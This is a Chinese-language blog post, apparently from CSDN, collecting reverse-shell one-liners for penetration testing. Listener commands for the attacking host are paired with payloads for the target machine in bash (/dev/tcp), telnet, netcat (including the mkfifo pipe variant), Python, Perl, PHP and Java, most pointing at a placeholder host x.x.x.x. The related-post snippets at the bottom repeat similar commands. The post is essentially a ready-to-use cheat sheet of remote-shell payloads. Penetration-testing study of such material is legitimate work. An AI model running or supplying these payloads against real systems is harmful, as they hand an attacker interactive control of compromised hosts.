反弹Shell姿势

最新推荐文章于 2024-04-06 14:19:17 发布
最新推荐文章于 2024-04-06 14:19:17 发布
阅读量141 收藏
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnvyou_/article/details/115695422
版权

反弹Shell多种姿势

0X01 Bash反弹

攻击者主机上执行监听:

nc -lvvp port

目标主机上执行:

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

0X02 telnet反弹

攻击者主机上打开两个终端分别执行监听:

nc -lvvp 4444

nc -lvvp 6666

目标主机中执行:

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 6666

(监听两个端口分别用来输入和输出,反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。)
0X03 netcat反弹
攻击者主机上执行监听命令:

nc -lvvp port

目标主机上执行:

nc -e /bin/bash x.x.x.x port

目标主机不支持-e参数时,还有以下几种方式

  1. rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f

  2. nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555

  3. nc -c /bin/sh x.x.x.x 4444

  4. /bin/sh | nc x.x.x.x 4444
    0X04 常见脚本反弹
    攻击者主机上执行监听命令:

nc -lvvp 6666

目标主机上执行:
(1) Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);’

(2)Perl
方法一:

perl -e ‘use Socket;$i=“x.x.x.x”;$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
方法二:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

(3) PHP

php -r '$sock=fsockopen("x.x.x.x",6666);exec("/bin/bash -i <&3 >&3 2>&3");'

(4) Java

    public class Revs {
    /**


    * @param args
    * @throws Exception 

    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/6666;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
sunfilowers
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
花一天时间搞懂反弹shell的命令!bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
weixin_53306211的博客
10-28 1789
【代码】花一天时间搞懂反弹shell的命令!
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6089
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
【安全知识】,看完不会的来打我
最新发布
imtokenmax众筹
04-06 1259
将标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。
转载:反弹shell的各种姿势
qq_43233085的博客
08-13 325
转载:反弹shell的各种姿势前言Linux 反弹shell姿势一:bash反弹姿势二:nc反弹姿势三:awk反弹姿势四:telnet反弹姿势五:socat反弹姿势六:Python反弹姿势七:PHP反弹姿势八:Perl反弹姿势九:Ruby反弹姿势十:Lua反弹姿势十一:JAVA反弹Windows反弹shell姿势一:nc反弹姿势二:powershell反弹姿势三:MSF反弹shell姿势四:Cobalt strike反弹shell姿势五:Empire反弹shell姿势六:nishang反弹shell姿势七:
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 940
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹shell姿势,并举例说明了间断类的特征,如awk和tclsh的使用,演示了如何在网络连接和命令执行间断的情况下建立控制。 作者强调,传统的交互式与非...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
反弹shell的N种姿势
weixin_42478365的博客
11-06 375
前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 #bash -i 打开一个交互的bash #>
反弹shell
songling515010475的专栏
05-11 1641
一、通过bash反弹shell 1、 在攻击机上通过nc命令监听2222端口 ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ... 2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口 [root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1 3、连..
多种姿势反弹shell
Brucetg的博客
08-20 7108
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
windows反弹_利用telnet反弹shell的两种方法
weixin_42302638的博客
01-27 515
今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。攻击机:目标机:下面给大家演示...
【linux】反弹备忘录
Kris__zhang的博客
06-16 664
Bash反弹 攻击者主机上执行监听 nc -lvvp port(端口) 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 命令 命令详解 bash -i 产生一个bash交互环境 >& 将标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port 调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口 0>&1 标准输入重定
[Shell]Telnet反弹shell
baguangman5501的博客
09-16 493
原作者:包子love 文章出处:黑白之道 今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。 这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,...
反弹shell的实现方式和检测方法
12-25 4353
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。 现在针对一些网络上反弹shell实例作说明:   反弹shell 现在针对一些网络上反弹shell实例作说明: 实例1,Bash反弹: Bash反弹,远程主机监听端口: nc -lvp 7777 被入侵的机器反弹shell命令如下: bash -i &gt;&am...
反弹shell无法反弹
08-13
关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值